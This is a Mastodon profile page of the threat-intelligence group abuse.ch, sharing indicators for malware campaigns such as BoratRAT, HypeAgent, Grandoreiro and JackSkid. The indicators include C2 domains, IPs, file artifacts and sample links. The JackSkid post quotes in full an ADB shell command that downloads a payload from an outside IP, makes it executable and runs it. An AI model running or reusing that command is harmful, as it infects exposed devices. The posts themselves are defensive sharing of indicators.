Elektrine
Log in Register
Paige Chat Timeline Gallery Friends Email Drive DNS Private DNS Domains VPN Kairo Nerve
Remote

abuse.ch :verified:

@abuse_ch@ioc.exchange
mastodon 4.8.0-alpha.3+glitch
  • Open on ioc.exchange

#cybersecurity - Fighting #malware and #botnets

2296 Followers
51 Following
20 Posts
Joined November 11, 2022
URL:
https://abuse.ch
Twitter:
https://twitter.com/abuse_ch
LinkedIn:
https://linkedin.com/company/abuse-ch
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 1mo ago

#BoratRAT spreading using similar tactics as #ClickFix 👇

1️⃣ Fake Microsoft Security Verification 🔑 leading to malicious PowerShell execution 🖱️
2️⃣ Command triggers a DNS TXT request to recapture-robot .today 🌐 to obtain a PowerShell script 📜
3️⃣ Script drops payload, infecting host with BoratRAT 💻

Payload delivery:
🌐 recapture-robot .today (PDR 🇮🇳)
🌐 91.193.7.186:49094 (M247 🇯🇵)

Botnet C2:
📡 out-agent.duckdns .org
📡 91.193.7.186:48988 (M247 🇯🇵)

📄 Sample:
https://bazaar.abuse.ch/sample/5a8ab21cb329b8672379421dcf5bc59e6f174da6b835d5650cd0f50d7c4df534/

ioc.exchange
10
0
4
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 1mo ago

We identified a new malware called #HypeAgent which acts as information stealer & loader. It is dominantly spread through malspam 📧, first observed on August 1, 2026 🔭👀

Key Capabilities ⤵️
🕵️ Stealer & Loader: Supports 200+ commands; drops/executes payloads, including crypto miners 💸
🔎 Targeted Harvesting: Steals web browser & email credentials, crypto wallets, and gaming accounts (Steam, Roblox) 🎮
🤖 AI & Platform Cookie Stealing: Targets a list of hardcoded domains like Grok, Anthropic, Coinbase, ByBit, Instagram, and Rockstar Games for which it steals session cookies 🍪
💰 Electron App Webinjects: Intercepts activity on desktop apps like Exodus Wallet 👛

Artifacts observed ⤵️
1️⃣ Stores stealers logs under C:\Users\USERNAME\AppData\Local\Temp\hype-YYYY-MM-DD.log
2️⃣ Uses HTTP host header "X-Hype-Agent-Token" during botnet C2 communication

HypeAgent communicates via WebSocket using JSON. Here are some Botnet C2 servers we have been observed ⤵️
📡 31.40.204.178:7080 WhiteLabel 🇹🇷
📡 94.26.3.211:7443 Stellar Group SAS 🇫🇷
📡 192.109.139.91:7443 Stellar Group SAS 🇺🇸
📡 195.177.94.60:7443 Stellar Group SAS 🇫🇷
📡 107.175.148.122:7443 HostPapa 🇺🇸
📡 209.54.103.173:7443 HostPapa 🇺🇸
📡 132.243.225.173:7080 QWINS-Hosting 🇩🇪
📡 78.40.209.113:7081 QWINS-Hosting 🇫🇮
📡 31.77.138.55:5654 QWINS-Hosting 🇫🇮

🦊 Releated IOCs on ThreatFox:
https://threatfox.abuse.ch/browse/tag/HypeAgent/

📄 Releated malware samples on MalwareBazaar:
https://bazaar.abuse.ch/browse/signature/HypeAgent/

ioc.exchange
13
0
2
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 2mo ago

Rogue #ScreenConnect RMM cluster using a fake COLDCARD domain to lure crypto wallet owners 💰 into downloading a fake DocuSign MSI which drops ScreenConnect 🖱️🖥️

⛓️ Attack Chain:
Threat actor domain ➡️ GitHub repo ➡️ ScreenConnect

🔍 Fake #COLDCARD domain with opendir:
hardware-data .com ➡️ Tucows Domains 🇺🇸

⚙️ Rogue GitHub user with 19 code repositories:
https://github.com/kaswareteam/

🔌 ScreenConnect RMM botnet C2s (Port 8041 TCP):

🇺🇸 DeltaHost :
hitpanels .com ➡️ 185.174.101.132
hitspanels .com ➡️ 185.174.101.132

🇺🇸 1337 Services GmbH:
vicspanel .com ➡️ 155.2.192.94
hitstp .com ➡️ 155.2.192.235
vps133panel .com ➡️ 203.159.90.31

🦊 IOCs on ThreatFox:
https://threatfox.abuse.ch/browse/tag/ScreenConnect/

🏠 Payload delivery URLs on URLhaus:
https://urlhaus.abuse.ch/browse/tag/screenconnect/

ioc.exchange
9
0
2
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 1mo ago

NeedleStealer 🪡🪝 written in Go ⤵️

🔎 HTTP user agents observed:
User-Agent: Loader-cli/v1
user-agent: Go-http-client/2.0

📡 Botnet C2s, all behind Cloudflare CDN:
http://woolvilli .com/api/v2
http://allremdeskriki .com/api/v2
http://dubl1allremriki .com/api/v2
http://dubl2allremriki .com/api/v2

💡 Related C2 infrastructure at Vultr 🇳🇱:
http://136.244.100 .54:8899/api/v1/agent/register
http://136.244.100 .54:8899/api/v1/agent/ws

⚱️ Artifacts:
\Sessions\1\BaseNamedObjects\Local\NeedleRemoteAgentSingle
C:\Users\user\AppData\Local\Temp\needle-2fa

📄 Malware samples:
https://bazaar.abuse.ch/browse/signature/NeedleStealer/

🦊 Relevant IOCs are on ThreatFox:
https://threatfox.abuse.ch/browse/tag/NeedleStealer/

Stealer admin panel⤵️

bazaar.abuse.ch
6
0
4
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 1mo ago

Overlord RAT 🔌 dropped by Amadey loader 🔥

Botnet C2 server:
mypamella .xyz ➡️ NameSilo 🇺🇸
136.175.82.88:443 ➡️ 2ETELECOM🇧🇬

Payload is bulletproof hosted 🛡️at Omegatech LTD 🇳🇱
🌐 https://urlhaus.abuse.ch/url/3906755/

📄 Malware sample:
https://bazaar.abuse.ch/sample/ac1f8b34486eabbb9ae6c3880a4b57dbf044cbfcc7f103ab3c93ed4f26285c3b/

🦊 Further IOCs on ThreatFox:
https://threatfox.abuse.ch/browse/malware/win.overlord/

Admin panel ⤵️

urlhaus.abuse.ch
4
1
2
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 2mo ago
It's here!! The @abuse_ch@ioc.exchange #CommunityHub is LIVE 🔥🔥🔥 Now you can access a LIVE view of: ➡️ Total community contributions ➡️ Top 10 Leaderboards ➡️ Monthly contribution trends ....and a place to track your own impact! Our community is bigger than any one platform. It's a global network of researchers working together to disrupt malware, botnets, and cybercrime. And every contributor deserves recognition 💛 Head to the Community and claim your profile 👉 abuse.ch/community
9
0
3
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 1mo ago
Over the past days, active #malspam campaigns targeting LatAm users 🇦🇷🇧🇷🇲🇽 have been delivering the Grandoreiro banking trojan 🏦💰 📧 Email ➔ 📜 JS file ➔ 📑 Fake PDF download Final payload is hosted on MediaFire 🔥 free file hosting C2 network traffic is rather trivial to detect as #Grandoreiro is using Embarcadero Delphi compilation tools' HTTP user agent 🖥️⤵️ User-Agent: Embarcadero URI Client/1.0 🔎 Botnet C2 domain resolved via Google DNS-over-HTTPS (DoH): devilmaycry.servehumour .com 👀 📡 Grandoreiro botnet C2s hosted at AWS: 54.80.154.193 54.91.129.132 54.91.223.28 🌐 Payloads URLs: https://urlhaus.abuse.ch/browse/tag/Grandoreiro/ 📄 Malware samples: https://bazaar.abuse.ch/browse/signature/Grandoreiro/ 🦊 Relevant IOCs are available on ThreatFox: https://threatfox.abuse.ch/browse/malware/win.grandoreiro/
urlhaus.abuse.ch
6
0
4
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 2mo ago
Interesting unlabeled malware sample shared by our friend smica83, apparently targeting UA users 🇺🇦🕵️ The malware sample: 1️⃣ Obtains the DNS A record of ns2.theendlessweb .com 2️⃣ Queries directly the DNS A record (207.90.251 .10) for the DNS TXT record of sni13.docsmanagement.endl .site 3️⃣ 207.90.251 .10 returns a PowerShell command as part of the DNS TXT record 4️⃣ Malware executes the PS command and obtains second stage from global-research .space/adv13.php global-research .space has been registered almost a year ago, which suggests that this campaign is already running since quite a while 📅 It also returns a fake HTTP 404, which indicates that the payload delivery is restricted to a handful targets 🎯 IOCs 📡 %ProgramData%\Microsoft\HTML Help\hhcolreg.dat %APPDATA%\Microsoft\HTML Help\hh.dat https://threatfox.abuse.ch/ioc/1855885/ https://threatfox.abuse.ch/ioc/1855883/ Malware sample 📄 https://bazaar.abuse.ch/sample/32a962439ec0fb5559e494fe1ea6be039815d3c4c1cceb95b16dc123e5abde61/
threatfox.abuse.ch
10
2
3
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 2mo ago
📢 SERVICE UPDATE | As you may have noticed, we've experienced some downtime recently which was largely caused by a small number of users exceeding our Fair Use Policy. To protect platform stability and ensure fair access for everyone as our user base grows, we are introducing API rate limits. Accounts generating unusually high query volumes may be temporarily limited for up to 72 hours. Repeated or persistent abuse may result in longer-term restrictions on API access.
7
1
2
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 3mo ago

Our platforms were recently targeted by a large-scale web scraping operation originating from devices that are apparently participating in residential proxy networks 🏘️ 🖥️ . The vast majority of these requests were successfully blocked by our existing mitigations 🛑 . However, the sheer volume of traffic caused temporary disruptions to both the MalwareBazaar and URLhaus platforms ⚠️

To put the scale into perspective, our web platforms typically handle approximately 1,500 requests per second (excluding traffic to our community API and commercial APIs). During this incident, the scraping operation leveraged more than 135,000 unique IP addresses, most of which could be identified as nodes in residential proxy networks 🔍

The offender attempted to remain undetected by sending very few requests (less than 5) per IP address to the platforms 🕵

Below are the top networks sourcing this traffic (by unique IPs):

2,961 AS25019 SAUDINETSTC 🇸🇦
1,995 AS206206 KNET 🇮🇶
1,984 AS9121 TTNet 🇹🇷
1,954 AS3215 Orange 🇫🇷
1,871 AS12322 PROXAD 🇫🇷
1,550 AS5410 BOUYGTEL-ISP 🇫🇷
1,531 AS37705 TOPNET 🇹🇳
1,413 AS8193 BRM-AS 🇺🇿

We are sharing details of the involved IPs, along with the relevant timestamps, here for your awareness ⤵️

https://raw.githubusercontent.com/abusech/misc/refs/heads/main/2026-06-22_Residential-Proxy-Scraping-IPs.csv

raw.githubusercontent.com
13
0
9
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 1mo ago

StealC C2 domains dropping OverlordRAT, using CloudFlare and Microsoft look-a-like domains 👁️
🌐 cloud-flare-authenticator .link
🌐 cloud-flare-authenticator .click
🌐 update-microsoft-data .services
📡 89.34.90.45:443

OverlordRAT #botnet C2 server ⤵️
🌐 download-windows-update .live
📡 151.243.113.94:5173

Both hosted at AS207043 DEDIK-IO in Germany🇩🇪

📄 Malware sample:
https://bazaar.abuse.ch/sample/5c61c977440dd7e870c1a63037558dd3fc2c41c8fd9d6ab67acff1c7d35abe01/

🦊 IOCs on ThreatFox:
https://threatfox.abuse.ch/browse/malware/win.stealc/
https://threatfox.abuse.ch/browse/tag/OverlordRAT/

ioc.exchange
4
0
2
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 3mo ago

Something new is coming for abuse.ch contributors... watch this space! 👀

#ComingSoon #CommunityHub #SharingIsCaring 😻🥇💛

ioc.exchange
8
0
0
1
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 2mo ago

JackSkid malware spreading from 46.151.178.13 (SINOWORLDWIDE 🇳🇱) on exposed devices running Android Debug Bridge (ADB) ⤵️

ADB command:
⚙️ shell:busybox wget http://94.154.43 .48/rebirth.arm7 -O /data/local/tmp/com.supercell.clashroyal; chmod 777 /data/local/tmp/com.supercell.clashroyal; ./data/local/tmp/com.supercell.clashroyal adb;

Delivering #JackSkid using DNS TXT record of ricocaseagainst.rebirth .st as botnet C2:
📡 178.16.52.104 (OMEGATECH 🇩🇪)

Payload delivery URLs (STORMCLOUD 🇹🇷):
🌐 https://urlhaus.abuse.ch/host/94.154.43.48/

Malware sample 📄:
https://bazaar.abuse.ch/sample/849840d92c44ed04af624abd9e5d79a7a082016c89ac39ac50d19f3d537839b5/

Botnet C2:
📡 https://threatfox.abuse.ch/ioc/1772413/
📡 https://threatfox.abuse.ch/ioc/1838514/

ioc.exchange
3
0
2
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 4mo ago

Botnet C2 tied to an unidentified #malware family trying to hide as FortiGate device 😜

🌐 Domain: az2030port.duckdns .org
📡 C2: 178.16.55.28:2030 ➡️ Omegatech LTD🇳🇱
🔐 SSL certificate: FortiGate, O=Fortinet Ltd.

Corresponding malware samples ⤵️
https://hunting.abuse.ch/hunt/6a285c89c73e5/178.16.55.28/

ioc.exchange
6
1
3
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 3mo ago

RE: @spamhaus@infosec.exchange

New loader in town SolarisLoader spotted by @spamhaus@infosec.exchange and abuse.ch 🔥

📡 SolarisLoader IOCs (botnet C2 servers):
https://threatfox.abuse.ch/browse/tag/SolarisLoader/

📄 SolarisLoader malware samples:
https://bazaar.abuse.ch/browse/tag/SolarisLoader/

⚙️ SolarisLoader configs are available:
https://github.com/spamhaus/CTI/tree/main/solarisloader

infosec.exchange
4
0
0
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 5mo ago

My favorite Remus botnet C2 domain so far 😄

havelbeenpwned .net ⤵️
NICENIC INTERNATIONAL🇨🇳

103.211.219.238:4219⤵️
AS394695 PUBLIC-DOMAIN-REGISTRY 🇮🇳

Malware sample:
https://bazaar.abuse.ch/sample/75fce6ec4b0815d7ccc9d87c2687c3c379c8e446739b3302b72688dd632c9f9e/

More #Remnus IOCs available on ThreatFox 🦊
https://threatfox.abuse.ch/browse/malware/win.remus/

/cc @troyhunt@infosec.exchange

bazaar.abuse.ch
6
0
1
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 10mo ago

We’ve identified an interesting malware family 🔍, which we’ve named #GrokPy due to its use of a Grok LLM model 🤖 to solve and subsequently bypass CAPTCHAs 🔥

The malware gets dropped by #Amadey and:

🪝 collects information about the infected device, such as screen resolution, public IP & location, ram usage and CPU name
💻 attempts to escalate privileges by running as admin or as a scheduled task

ioc.exchange

IOC.exchange

7
1
6
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 15mo ago

We are happy to announce the integration of @kunai_project@infosec.exchange Linux Sandbox on MalwareBazaar 🥳

Sample ELF X86 report ⤵️
https://bazaar.abuse.ch/sample/0d2211b7e92fcc6a9f7c94d4adf8e47f6f97e31dacd3b2ffb6cce3c485fcef26/

bazaar.abuse.ch
13
1
11
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 5mo ago

@frehi@fosstodon.org Thanks, will check it out

1
1
0
0
Open post
abuse.ch :verified: @abuse_ch@ioc.exchange
· 5mo ago

Malspam 📧 targeting Spanish users 🇪🇸

Email ➡️ geo filter ➡️ mediafire ➡️ iso ➡️ vbs

1st stage - geo filter 🛑
vmi3228488.contaboserver .net Contabo 🇩🇪

2nd stage - payload 📄
https://urlhaus.abuse.ch/url/3824487/

Dropped iso:
https://bazaar.abuse.ch/sample/faaa4d005314440dfd7ed5fa2f522e1a2642f08ec3bf0c1e2779a39bf4268349/

Botnet C2:
📡 54.197.208.68 Amazon 🇺🇸

urlhaus.abuse.ch
1
0
1
0
Back
313k7r1n3
Elektrine

Tor hidden service

elekhj7afj4qnrr4yd3bkzslsyo5jgfxw3orgjkhlcxifueodybyiiad.onion

I2P eepsite

j6b6cyk6gjmepjih7jjadxgxvvf3lzzujljuu2v4biemzpg3naya.b32.i2p

Platform

  • Email
  • Chat
  • Timeline
  • VPN
  • DNS

Company

  • About
  • Contact
  • FAQ
  • Lite (no JS)

Legal

  • Terms of Service
  • Privacy Policy
  • Transparency Report
  • Report Abuse
  • Warrant Canary
  • VPN Policy

Support

  • support@elektrine.com
  • Report Security Issue
Mail client setup IMAP mail.elektrine.com:993 POP3 mail.elektrine.com:995 SMTP mail.elektrine.com:465
© 2026 Elektrine. All rights reserved. Server: 20:05:44 UTC